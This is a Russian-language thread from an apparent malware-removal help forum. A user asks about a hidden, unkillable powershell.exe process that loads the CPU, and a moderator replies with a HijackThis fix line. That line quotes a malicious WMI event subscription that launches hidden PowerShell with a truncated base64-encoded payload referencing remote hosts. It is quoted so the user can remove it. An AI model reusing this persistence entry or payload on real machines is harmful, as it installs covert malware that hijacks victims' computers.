• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

В работе Вирус через powershell.exe нагружает процессор

NerV

Новый пользователь
Сообщения
1
Реакции
0
Баллы
1
Здравствуйте.
Процесс powershell.exe загружает процессор примерно на 50-60%. Это уже не первый случай на этом компьютере обнаружения этой гадости, но прежде удавалось обходиться своими силами убивая процесс и удаляя задачу в планировщике. А теперь процесс пауршелла скрывается из общего списка в диспетчере и увидеть можно лишь через Process Explorer. При этом его даже не убить, система говорит что недостаточно привелегий.
 

Вложения

Последнее редактирование:

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
5,771
Реакции
1,925
Баллы
563
Здравствуйте!

"Пофиксите" в HijackThis:
Код:
O25 - WMI Event: Systems Manage Consumer - Systems Manage Filter - Event="__InstanceModificationEvent WITHIN 5601 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  powershell.exe -NoP -NonI -W Hidden -E JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwApACwAKAAnAGkAbgBmAG8ALgA3AGgANAB1AGsALgBjAG8AbQAnACkALAAoACcAMQAxADEALgA5ADAALgA
Перезагрузите компьютер вручную и соберите свежий CollectionLog.
 
Сверху Снизу